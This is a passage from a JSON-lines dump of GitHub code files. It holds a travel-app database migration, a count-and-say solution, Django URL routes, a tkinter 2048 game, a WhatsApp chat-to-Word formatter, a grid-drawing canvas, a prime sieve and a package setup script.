'Woman')]\n\nBUDGET = [('small', '<250$'),\n ('medium', '250$-750$'),\n ('regular', '750$-1500$'),\n ('big', '1500$+')]\n\nTYPE_OF_TRIP = [\n (\"city_break\", \"City break\"),\n (\"work_and_travel\", \"Work&travel\"),\n (\"roadtrip\", \"Roadtrip\"),\n (\"backpacking\", \"Backpacking\"),\n (\"vacations\", \"Vacations\"),\n (\"other\", \"Other\"),\n]\n\nHOUSING = [\n (\"camping\", \"Camping\"),\n (\"airbnb\", \"AirBnB\"),\n (\"couchsurfing\", \"Couchsurfing\"),\n (\"hotels\", \"Hotels\"),\n (\"hostels\", \"Hostels\"),\n (\"other\", \"Other\"),\n]\n\nFOOD = [\n (\"self\", \"Self-cooking\"),\n (\"fastfoods\", \"Fast foods\"),\n (\"bistros\", \"Bistros\"),\n (\"restaurants\", \"Restaurants\"),\n]\n\n# revision identifiers, used by Alembic.\nrevision = 'f09275db1589'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('profile',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=50), nullable=True),\n sa.Column('last_name', sa.String(length=50), nullable=True),\n sa.Column('mobile', sa.String(length=50), nullable=True),\n sa.Column('date_of_birth', sa.Date(), nullable=True),\n sa.Column('country', sa.String(length=200), nullable=True),\n sa.Column('if_english', sa.Boolean(), nullable=True),\n sa.Column('about', sa.String(length=255), nullable=True),\n sa.Column('gender', sqlalchemy_utils.types.choice.ChoiceType(choices=GENDER), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.String(length=50), nullable=True),\n sa.Column('password', sa.String(length=200), nullable=True),\n sa.Column('profile_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['profile_id'], ['profile.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('trip',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('start_date', sa.Date(), nullable=True),\n sa.Column('end_date', sa.Date(), nullable=True),\n sa.Column('trip_title', sa.String(length=100), nullable=True),\n sa.Column('gender', sqlalchemy_utils.types.choice.ChoiceType(choices=GENDER), nullable=True),\n sa.Column('type_of_trip', sqlalchemy_utils.types.choice.ChoiceType(choices=TYPE_OF_TRIP), nullable=True),\n sa.Column('housing', sqlalchemy_utils.types.choice.ChoiceType(choices=HOUSING), nullable=True),\n sa.Column('food', sqlalchemy_utils.types.choice.ChoiceType(choices=FOOD), nullable=True),\n sa.Column('budget', sqlalchemy_utils.types.choice.ChoiceType(choices=BUDGET), nullable=True),\n sa.Column('must_do', sa.String(length=255), nullable=True),\n sa.Column('must_see', sa.String(length=255), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['owner_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('activity',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('activity_name', sa.String(length=255), nullable=True),\n sa.Column('trip_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trip_id'], ['trip.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('favourite',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('trip_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trip_id'], ['trip.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('place',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('place_name', sa.String(length=255), nullable=True),\n sa.Column('trip_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trip_id'], ['trip.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('place')\n op.drop_table('favourite')\n op.drop_table('activity')\n op.drop_table('trip')\n op.drop_table('user')\n op.drop_table('profile')\n # ### end Alembic commands ###\n","repo_name":"ktomaszewska97/TravelBuddy","sub_path":"migrations/versions/f09275db1589_.py","file_name":"f09275db1589_.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29539370063","text":"'''\n\tThe count-and-say sequence is the sequence of integers with the first five terms as following:\n\n\t1. 1\n\t2. 11\n\t3. 21\n\t4. 1211\n\t5. 111221\n\n\t1 is read off as \"one 1\" or 11.\n\t11 is read off as \"two 1s\" or 21.\n\t21 is read off as \"one 2, then one 1\" or 1211.\n\n\tGiven an integer n, generate the nth term of the count-and-say sequence. \n'''\n\nclass Solution(object):\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n \n if n == 1:\n \treturn \"1\"\n new_num = \"\"\n count_iter = 1\n num = \"1\"\n\n while count_iter < n: \n \tindex_i, index_j = 0, 0\n \tcount, new_num = 0, \"\"\n\n \twhile index_j < len(num):\n \t\tif num[index_i] != num[index_j]:\n \t\t\tnew_num += str(count) + str(num[index_i])\n \t\t\tcount = 0\n \t\t\tindex_i = index_j\n \t\telse:\n \t\t\tcount += 1\n \t\t\tindex_j += 1\n\n \tif count > 0:\n \t\tnew_num += str(count) + str(num[index_i])\n \tnum = new_num\n \tcount_iter += 1\n\n return new_num\n\n# Space: O(1)\n# Time: O(N*k) k= length of string","repo_name":"Garvit244/Leetcode","sub_path":"1-100q/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1245,"dataset":"github-code","pt":"48"} +{"seq_id":"32270567271","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom django.conf.urls import url\n\nfrom ..views.frontend import *\n\nurlpatterns = [\n # meters management\n url(r'^moje_liczniki$', MetersListView.as_view(), name='meters_list_view'),\n url(r'^usun_licznik/(?P[\\d]+)$', RemoveMeterView.as_view(),\n name='remove_meter'),\n url(r'^dodaj_licznik$', AddMeterView.as_view(), name='add_meter'),\n url(r'^licznik/(?P[\\d]+)$', MeterDataView.as_view(),\n name='meter_data_view'),\n url(r'^ustaw_jako_glowny$', SetMeterAsMainView.as_view(),\n name='set_as_main_view'),\n url(r'^zmien_alias/(?P[\\d]+)$', ChangeMeterAliasView.as_view(),\n name='change_meter_alias_view'),\n\n # alarms\n url(r'^moje_alarmy$', AlarmsListView.as_view(), name='alarms_list_view'),\n url(r'^alarm/(?P[\\d]+)$', AlarmDetailsView.as_view(),\n name='alarm_details_view'),\n url(r'^dodaj_alarm$', AddAlarmView.as_view(), name='add_alarm_view'),\n url(r'^edytuj_alarm/(?P[\\d]+)$', EditAlarmView.as_view(),\n name='edit_alarm_view'),\n url(r'^usun_alarm/(?P[\\d]+)$', DeleteAlarmView.as_view(),\n name='delete_alarm_view'),\n]\n","repo_name":"kamilstalkoper/moj_licznik","sub_path":"app/subapps/meters_management/urls/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12927019517","text":"from projetoMD.LIB.interface import *\ndef arqExiste(nome):\n try:\n a = open(nome, 'rt')\n a.close()\n except FileNotFoundError:\n return False\n else:\n return True\ndef criarrArquivo(nome):\n try:\n a = open(nome, 'wt+')\n a.close()\n except:\n print('Houve um erro na criação de arquivo')\n else:\n print(f'Arquivo {nome} criado com sucesso')\n\ndef lerArquivo(nome):\n try:\n a = open(nome,'rt', encoding='utf-8')\n\n except:\n print('Erro ao ler o arquivo!')\n else:\n cabeçalho('Definição de conjunto')\n print(a.read())\n","repo_name":"4l1son/interface","sub_path":"LIB/arquivo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3321190838","text":"\"\"\"\r\n2048 Game Clone\r\nLogan Howard\r\n2021-12-09\r\n\"\"\"\r\n# Imports\r\nimport tkinter as tk\r\nimport random\r\n\r\n# Constants\r\n\r\nBACKGROUND_C = \"#a39489\"\r\nEMPTY_TILE_C = \"#c2b3a9\"\r\n\r\nTILE_C = {\r\n 2: \"#fcefe6\",\r\n 4: \"#f2e8cb\",\r\n 8: \"#c4b791\",\r\n 16: \"#f1d185\",\r\n 32: \"#bfa569\",\r\n 64: \"#f0b7a4\",\r\n 128: \"#568ea6\",\r\n 256: \"#3e687a\",\r\n 512: \"#396e85\",\r\n 1024: \"#305f92\",\r\n 2048: \"#f18c8e\"\r\n}\r\n\r\n# Game class for 2048\r\nclass Game(tk.Frame):\r\n \r\n # Constructor\r\n def __init__(self):\r\n tk.Frame.__init__(self)\r\n self.grid()\r\n self.master.title('2048')\r\n # Create a main matrix to hold all tiles\r\n self.main_matrix = tk.Frame(self, bg=BACKGROUND_C, bd=1, width=500, height=500)\r\n self.main_matrix.grid(padx=(20), pady=(60, 20))\r\n\r\n # Bind keys for user input\r\n self.master.bind(\"\", self.move_left)\r\n self.master.bind(\"\", self.move_right)\r\n self.master.bind(\"\", self.move_up)\r\n self.master.bind(\"\", self.move_down)\r\n\r\n # Call methods to create and run game\r\n self.create_game()\r\n self.start_game()\r\n self.mainloop()\r\n\r\n # Function to create the game area (matrix, tiles, score)\r\n def create_game(self):\r\n # Build a matrix and fill it with tiles\r\n self.tiles= []\r\n for i in range(4):\r\n row = []\r\n for j in range(4):\r\n tile = tk.Frame(self.main_matrix, bg=EMPTY_TILE_C, width=100, height=100)\r\n tile.grid(row=i, column=j, padx=1, pady=1) # Place tile on matrix (tiles)\r\n num = tk.Label(self.main_matrix, bg=EMPTY_TILE_C) # Create num label for each tile\r\n num.grid(row=i, column=j) # Place label on tile\r\n data = {\"tile\": tile, \"num\": num} # Use labels to access info for future ref\r\n row.append(data)\r\n self.tiles.append(row)\r\n\r\n # Create score frame\r\n score_header = tk.Frame(self)\r\n score_header.place(relx=0.5, y=30, anchor=\"center\")\r\n tk.Label(score_header, text=\"Score\").grid(row=0)\r\n self.score_label = tk.Label(score_header, text=\"0\")\r\n self.score_label.grid(row=1)\r\n\r\n # Function to start the game \r\n def start_game(self):\r\n # Create an initial start matrix\r\n self.matrix = []\r\n for i in range(4):\r\n self.matrix.append([0] * 4)\r\n\r\n # Randomly choose row & col positions for the starting tiles\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n\r\n # Randomly choose weather to place a 2 or 4 for each starting tile\r\n start_num = random.choice([2, 4])\r\n self.matrix[row][col] = start_num\r\n self.tiles[row][col][\"tile\"].configure(bg=TILE_C[start_num])\r\n self.tiles[row][col][\"num\"].configure(bg=TILE_C[start_num], text=str(start_num))\r\n \r\n # Keep generating tiles while the current tile is not zero\r\n while(self.matrix[row][col] != 0):\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n \r\n # Randomly choose weather to place a 2 or 4 for each starting tile\r\n start_num = random.choice([2, 4])\r\n self.matrix[row][col] = start_num\r\n self.tiles[row][col][\"tile\"].configure(bg=TILE_C[start_num])\r\n self.tiles[row][col][\"num\"].configure(bg=TILE_C[start_num], text=str(start_num))\r\n\r\n # Initialize score\r\n self.score = 0\r\n\r\n # Function to stack\r\n def stack(self):\r\n # Create a new matrix\r\n new_matrix = []\r\n for i in range(4):\r\n new_matrix.append([0] * 4)\r\n\r\n # Perform stack\r\n for i in range(4):\r\n cur = 0\r\n for j in range(4):\r\n if self.matrix[i][j] != 0:\r\n new_matrix[i][cur] = self.matrix[i][j]\r\n cur += 1\r\n self.matrix = new_matrix\r\n\r\n # Function to combine tiles\r\n def combine(self):\r\n for i in range(4):\r\n for j in range(3):\r\n if self.matrix[i][j] != 0 and self.matrix[i][j] == self.matrix[i][j + 1]:\r\n self.matrix[i][j] *= 2\r\n self.matrix[i][j + 1] = 0\r\n self.score += self.matrix[i][j]\r\n\r\n # Function to reverse matrix\r\n def reverse(self):\r\n new_matrix = []\r\n for i in range(4):\r\n new_matrix.append([])\r\n for j in range(4):\r\n new_matrix[i].append(self.matrix[i][3 - j])\r\n self.matrix = new_matrix\r\n\r\n # Function to transpose matrix\r\n def transpose(self):\r\n # Create a new matrix\r\n new_matrix = []\r\n for i in range(4):\r\n new_matrix.append([0] * 4)\r\n\r\n # Perform the transpose\r\n for i in range(4):\r\n for j in range(4):\r\n new_matrix[i][j] = self.matrix[j][i]\r\n self.matrix = new_matrix\r\n\r\n # Function to add new tile\r\n def add_tile(self):\r\n # Get random tile pos\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n while(self.matrix[row][col] != 0):\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n self.matrix[row][col] = random.choice([2, 4])\r\n\r\n # Function to update game state\r\n def update_game(self):\r\n # Loop through all tiles in matrix\r\n for i in range(4):\r\n for j in range(4):\r\n cur = self.matrix[i][j]\r\n # Check current tiles value\r\n if cur == 0:\r\n # Update current tile data\r\n self.tiles[i][j][\"tile\"].configure(bg=EMPTY_TILE_C)\r\n self.tiles[i][j][\"num\"].configure(bg=EMPTY_TILE_C, text=\"\")\r\n else: # Otherwise determine its value and update tile data accordingly\r\n self.tiles[i][j][\"tile\"].configure(bg=TILE_C[cur])\r\n self.tiles[i][j][\"num\"].configure(bg=TILE_C[cur], text=str(cur))\r\n self.score_label.configure(text=self.score) # Update score\r\n self.update_idletasks()\r\n\r\n \r\n def move_left(self, key):\r\n # Manipulate matrix to move left\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n\r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n self.update_game()\r\n self.game_state()\r\n\r\n\r\n def move_right(self, key):\r\n # Manipulate matrix to move right\r\n self.reverse()\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n self.reverse()\r\n \r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n self.update_game()\r\n self.game_state()\r\n\r\n\r\n def move_up(self, key):\r\n # Manipulate matrix to move up\r\n self.transpose()\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n self.transpose()\r\n\r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n self.update_game()\r\n self.game_state()\r\n\r\n\r\n def move_down(self, key):\r\n # Manipulate matrix to move down\r\n self.transpose()\r\n self.reverse()\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n self.reverse()\r\n self.transpose()\r\n\r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n self.update_game()\r\n self.game_state()\r\n\r\n\r\n def horizontal_move_exists(self):\r\n for i in range(4):\r\n for j in range(3):\r\n if self.matrix[i][j] == self.matrix[i][j + 1]:\r\n return True\r\n return False\r\n\r\n\r\n def vertical_move_exists(self):\r\n for i in range(3):\r\n for j in range(4):\r\n if self.matrix[i][j] == self.matrix[i + 1][j]:\r\n return True\r\n return False\r\n\r\n\r\n \r\n # Function to check game state (win / lose)\r\n def game_state(self):\r\n # Check for 2048 within the matrix\r\n if any(2048 in row for row in self.matrix):\r\n game_over_frame = tk.Frame(self.main_matrix, borderwidth=2)\r\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\r\n tk.Label(game_over_frame, text=\"You win!\").pack()\r\n elif not any(0 in row for row in self.matrix) and not self.horizontal_move_exists() and not self.vertical_move_exists():\r\n game_over_frame = tk.Frame(self.main_matrix, borderwidth=2)\r\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\r\n tk.Label( game_over_frame, text=\"Game over!\").pack()\r\n\r\n\r\ndef main():\r\n Game()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"LoganHoward99/2048-game","sub_path":"2048.py","file_name":"2048.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39659970516","text":"import os\nimport re\n\nfrom docx import Document\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.shared import Inches, Pt\n\npath = \"assets/\"\nregexp = re.compile(r'^(0[1-9]|[12][0-9]|3[01])\\.(0[1-9]|1[012])\\.\\d\\d')\n\ndef formatFile(file):\n newContent = \"\"\n fullLine = \"\"\n hasContent = False\n for line in file:\n if (regexp.match(line)):\n if(hasContent):\n hasContent = False\n newContent += fullLine\n fullLine = line\n else:\n fullLine = fullLine.replace(\"\\n\", \" \")\n fullLine += line\n hasContent = True\n file.seek(0)\n file.truncate()\n file.write(newContent)\n\n\ndef transformFile(file):\n document = Document()\n oldDate = \"\"\n lineNumber = 1\n for line in file:\n date = line.split(\",\",1)[0]\n date = date.split(\".\")\n date[2] = \"20\" + date[2]\n date = date[0] + \".\" + date[1] + \".\" + date[2]\n\n if (date != oldDate):\n p = document.add_paragraph()\n run = p.add_run(\"\\n\" + date)\n run.bold = True\n font = run.font\n font.size = Pt(12)\n paragraph_format = p.paragraph_format\n paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n oldDate = date\n\n t = document.add_paragraph()\n time = line.split(\", \",1)[1]\n timeNoSec = time.split(\":\", 2)\n timeNoSec = timeNoSec[0] + \":\" + timeNoSec[1]\n t.add_run(timeNoSec).italic = True\n\n if(line.count(':') > 3):\n name = time.split(\":\")[3] + \":\\t\"\n t.add_run(name).bold = True\n text = time.split(\":\")[4].replace(\" \", \"\", 1).replace(\"\\n\", \" \")\n t.add_run(text)\n else:\n text = time.split(\":\", 3)[3].replace(\": \", \":\\t\", 1).replace(\"\\n\", \" \")\n t.add_run(text)\n\n tFormat = t.paragraph_format\n #print(text)\n tFormat.left_indent = Inches(2.5)\n tFormat.first_line_indent = Inches(-2.5)\n print(lineNumber)\n lineNumber += 1\n documentName = (file.name).replace(\".txt\", \".docx\")\n document.save(documentName)\n\nfor filename in os.listdir(path):\n if filename.endswith(\".txt\"):\n filename = os.path.join(path, filename)\n file = open(filename, 'r+')\n formatFile(file)\n file.close()\n file = open(filename, 'r+')\n transformFile(file)\n file.close()","repo_name":"kerschy/WhatsappFormatter","sub_path":"WhatsappFormatter.py","file_name":"WhatsappFormatter.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22435012737","text":"from Tkinter import *\nfrom constants import *\nfrom Segment import *\nfrom math import fabs, pi\n\n\nclass GridCanvas:\n\n segs = []\n helpCircles = []\n can = None\n helpShown = False\n firstCoords = None\n # allowSelfAvoidOnly is an option activated by default (can be deactivated\n # by the user in the GUI) which forbid segments collisions.\n allowSelfAvoidOnly = True\n lead = None\n\n # dct is the segment direction :\n # up -> 3\n # down -> 1\n # right -> 0\n # left -> 2\n\n def __init__(self, root):\n self.segs = []\n self.can = Canvas(root, bg=CBG, height=GSIZE, width=GSIZE)\n self.can.pack(expand=YES, side=LEFT)\n self.drawHelp()\n self.drawGrid()\n\n # Print help, add or remove segments with the mouse\n self.can.bind(\"\", self.click)\n self.can.bind(\"\", self.swipe)\n self.can.bind(\"\", self.swipeEnd)\n\n # Add or remove segments with the keyboard arrows\n for key in [\"\", \"\", \"\", \"\"]:\n self.can.bind(key, self.keyMove)\n\n # Move the draw on the screen. Keybinds :\n # \"q\": left\n # \"d\": right\n # \"z\": up\n # \"s\": down\n for key in [\"q\", \"d\", \"z\", \"s\"]:\n self.can.bind(key, self.keyCam)\n\n # Launch undo\n self.can.bind(\"\", self.undo)\n # Launch segments rotations around the double clicked point\n self.can.bind(\"\", self.doubleClick)\n\n self.lead = self.can.create_oval(MIDDLE - 3, MIDDLE - 3, MIDDLE + 3, MIDDLE + 3, fill=LFILL)\n\n # Necessary to avoid clicking on the window/grid at start\n self.can.focus_force()\n\n def drawGrid(self):\n \"\"\" Draws the grid on which the segment are gonna be bound \"\"\"\n for div in range(NBCELL):\n sec = SSIZE*div\n self.can.create_line(0, sec, GSIZE, sec, width=3, fill=GFILL)\n self.can.create_line(sec, 0, sec, GSIZE, width=3, fill=GFILL)\n\n def drawHelp(self):\n \"\"\" Draw circles on each cross on the grid to help the user \"\"\"\n self.helpCircles = []\n for hor in range(1, NBCELL):\n for ver in range(1, NBCELL):\n x = SSIZE*hor\n y = SSIZE*ver\n temp = self.can.create_oval(x - CR, y - CR, x + CR, y + CR, **HCOPT)\n self.helpCircles.append(temp)\n\n def hideHelp(self):\n \"\"\" Hide the circles (help) \"\"\"\n for circle in self.helpCircles:\n self.can.itemconfig(circle, **HCOPT)\n self.helpShown = False\n\n def showHelp(self):\n \"\"\" Show the circles (help) \"\"\"\n for circle in self.helpCircles:\n self.can.itemconfig(circle, **SCOPT)\n self.helpShown = True\n\n def wipe(self, segments):\n \"\"\" Clean the segments and redraw the walk given in parameter \"\"\"\n self.firstCoords = None\n self.moveLead(MIDDLE, MIDDLE)\n for seg in self.segs:\n self.can.delete(seg.getGraphicObject())\n seg.rmGraphicObject()\n self.segs = segments\n self.redrawSegs()\n\n def moveLead(self, x, y):\n \"\"\" Move the lead on the coordinates given in parameter \"\"\"\n self.can.coords(self.lead, x - 3, y - 3, x + 3, y + 3)\n\n def segRequest(self, x, y, X, Y, dct=None):\n \"\"\" Create a new segment at the coordinates given in parameter if possible.\n If there is already the last created segment, segRequest() delete it. \"\"\"\n free = self.freePoint(X, Y)\n if (not free) or (not self.allowSelfAvoidOnly):\n # segment backtrack\n if self.counterSeg(x, y, X, Y):\n if len(self.segs) > 0:\n self.moveLead(X, Y)\n else:\n leadX, leadY = self.segs[-1].getStartPoint()\n self.moveLead(leadX, leadY)\n self.eraseLastSeg()\n return\n if free:\n if dct is None:\n dct = self.findDct(x, y, X, Y)\n seg = Segment(x, y, dct)\n self.segs.append(seg)\n self.drawSeg(seg, SFILL)\n self.moveLead(X, Y)\n\n def requestSegByCircle(self, circle):\n \"\"\" Calculates the segment coordinates when it is created with the mouse \"\"\"\n Xa, Ya, Xb, Yb = self.can.coords(circle)\n X = (Xa + Xb)/2\n Y = (Ya + Yb)/2\n if self.segs == []:\n if self.firstCoords is not None:\n x, y = self.firstCoords\n else:\n self.firstCoords = (X, Y)\n self.moveLead(X, Y)\n return\n else:\n x, y = self.segs[-1].getEndPoint()\n cont = self.continuous(x, y, X, Y)\n if cont:\n self.segRequest(x, y, X, Y)\n\n def requestSegByDct(self, dct):\n \"\"\" Calculates the segment direction when it is created with the keyboard \"\"\"\n if self.segs == []:\n x, y = MIDDLE, MIDDLE\n else:\n x, y = self.segs[-1].getEndPoint()\n X, Y = {\n 0: (x + SSIZE, y),\n 1: (x, y + SSIZE),\n 2: (x - SSIZE, y),\n 3: (x, y - SSIZE),\n }[dct]\n self.segRequest(x, y, X, Y, dct)\n\n def findDct(self, x, y, X, Y):\n \"\"\" Return the segment direction \"\"\"\n if x == X:\n if Y < y:\n return 3\n else:\n return 1\n else:\n if X > x:\n return 0\n else:\n return 2\n\n def counterSeg(self, x, y, X, Y):\n \"\"\" Return segments number between the start point and the end point \"\"\"\n if self.segs == []:\n return False\n st = self.segs[-1].getStartPoint()\n end = self.segs[-1].getEndPoint()\n return st == (X, Y) and end == (x, y)\n\n def freePoint(self, X, Y):\n \"\"\" Check if it is possible to draw a segment at the cordinated given in\n parameter. \"\"\"\n if X < 0 or Y < 0 or X > GSIZE or Y > GSIZE:\n return False\n if not self.allowSelfAvoidOnly:\n return True\n if self.segs == []:\n return True\n if self.segs[0].getStartPoint() == (X, Y):\n return False\n for seg in self.segs:\n if seg.getEndPoint() == (X, Y):\n return False\n return True\n\n def continuous(self, x, y, X, Y):\n \"\"\" Check if the space between the first point and the second point is\n composed by continuous segments \"\"\"\n hor = fabs(x - X) == SSIZE and y == Y\n ver = fabs(y - Y) == SSIZE and x == X\n return (hor and not ver) or (ver and not hor)\n\n def drawSeg(self, seg, sfill=SFILL):\n \"\"\" Draw segment(s) from the start point to the end point. \"\"\"\n x, y = seg.getStartPoint()\n X, Y = seg.getEndPoint()\n go = self.can.create_line(x, y, X, Y, width=3, fill=sfill)\n seg.addGraphicObject(go)\n\n def eraseLastSeg(self):\n \"\"\" Clear the last segment \"\"\"\n self.can.delete(self.segs.pop().getGraphicObject())\n\n def redrawSegs(self):\n \"\"\" Draw a walk given in parameter \"\"\"\n for seg in self.segs:\n self.drawSeg(seg)\n\n def findInter(self, x, y):\n \"\"\" Check if the cursor is in a circle (hitbox) :\n yes -> return the circle,\n no -> return false. \"\"\"\n items = self.can.find_overlapping(x, y, x, y)\n for item in items:\n if item in self.helpCircles:\n return item\n return False\n\n def swipe(self, event):\n \"\"\" Create segments in following the cursor\n (Called when the left mouse button is keeping pressed) \"\"\"\n if not self.helpShown:\n self.showHelp()\n circle = self.findInter(event.x, event.y)\n if circle:\n self.requestSegByCircle(circle)\n\n def swipeEnd(self, event):\n \"\"\" Hide circles (help)\n (Called when the left mouse button is released) \"\"\"\n if self.helpShown:\n self.hideHelp()\n\n def click(self, event):\n \"\"\" Show help and initialize the first segment point\n (Called when the left mouse button is pressed) \"\"\"\n if self.segs == []:\n startCircle = self.findInter(event.x, event.y)\n if startCircle:\n xa, ya, xb, yb = self.can.coords(startCircle)\n self.firstCoords = ((xa + xb)/2, (ya + yb)/2)\n if not self.helpShown:\n self.showHelp()\n\n def doubleClick(self, event):\n \"\"\" Rotates all following segments from the double clicked node\n (Called when the left button is pressed twice) \"\"\"\n doRotation = False\n\n self.can.focus_force()\n interCircle = self.findInter(event.x, event.y)\n if interCircle:\n xa, ya, xb, yb = self.can.coords(interCircle)\n inter = ((xa + xb)/2, (ya + yb)/2)\n for seg in self.segs:\n if (not doRotation) and (seg.getStartPoint() == inter):\n doRotation = True\n lastInter = inter\n if doRotation:\n seg.place(lastInter)\n seg.rotate(pi/2)\n lastInter = seg.getEndPoint()\n\n self.wipe(self.segs)\n\n def moveAllSeg(self, dct, amount=1):\n \"\"\" Move all segments in a direction given in parameter \"\"\"\n dx, dy = {\n 0: (amount * SSIZE, 0),\n 1: (-amount * SSIZE, 0),\n 2: (0, amount * SSIZE),\n 3: (0, -amount * SSIZE)\n }[dct]\n for seg in self.segs:\n seg.move(dx, dy)\n self.wipe(self.segs)\n self.moveLead(dx, dy)\n\n def keyMove(self, event):\n \"\"\" Set a direction from the keyboard arrow pressed by the user, and create\n a new segment in this direction \"\"\"\n UP = 111\n RIGHT = 114\n DOWN = 116\n LEFT = 113\n dct = {\n RIGHT: 0,\n DOWN: 1,\n LEFT: 2,\n UP: 3\n }[event.keycode]\n self.requestSegByDct(dct)\n\n def keyCam(self, event):\n \"\"\" Set a direction from the keyboard arrow pressed by the user, and move\n the map in this direction\n z : up\n q : left d : right\n s : down \"\"\"\n dct = {\n \"d\": 0,\n \"s\": 1,\n \"q\": 2,\n \"z\": 3\n }[event.char]\n self.moveAllSeg(dct)\n\n def undo(self, event=None):\n \"\"\" Delete the last segment (uses the fact that creating a segment over the\n last one erase it).\n TODO : make it compatible with rotation \"\"\"\n if not self.segs == []:\n self.requestSegByDct((self.segs[-1].getDct() + 2) % 4)\n","repo_name":"Aquassaut/Serpentide","sub_path":"GridCanvas.py","file_name":"GridCanvas.py","file_ext":"py","file_size_in_byte":10794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23065928020","text":"#seive of eratosthenes\ndef sieve(n):\n\t\tif n<=2: # if n is less than 2, return empty list\n\t\t\treturn [] #no prime numbers\n\t\tis_prime = [True] * n #create a list of booleans\n\t\tis_prime[0] = False # 0 is not prime\n\t\tis_prime[1] = False # 1 is not prime\n\n\t\tfor i in range(2, int(n**0.5)+1):\n\t\t\tx = i*i #multuiples of i are not prime\n\t\t\twhile x < n: \n\t\t\t\tis_prime[x] = False \t\n\t\t\t\tx += i \n\n\t\treturn [i for i in range(n) if is_prime[i] ] \t\n\n\t\t\n\nprint(sieve(12554)) # runtime 0.0009970664978027344\n","repo_name":"vasu8480/Programs-HackerRank-LeetCode-","sub_path":"Python/Algorithms/Problems/seive.py","file_name":"seive.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73239385744","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nrequirements = ['Click>=7.0', ]\n\nsetup_requirements = [ ]\n\ntest_requirements = [ ]\n\nsetup(\n author=\"Colm Halpin\",\n author_email='colm.halpin@bchcustoms.com',\n python_requires='>=3.5',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"Meursing coder - creates customs master data for agrifood products requiring a four-digit additional code for customs and duty purposes\",\n entry_points={\n 'console_scripts': [\n 'meursing=meursing.cli:main',\n ],\n },\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='meursing',\n name='meursing',\n packages=find_packages(include=['meursing', 'meursing.*']),\n setup_requires=setup_requirements,\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/bchcustoms/meursing',\n version='0.1.0',\n 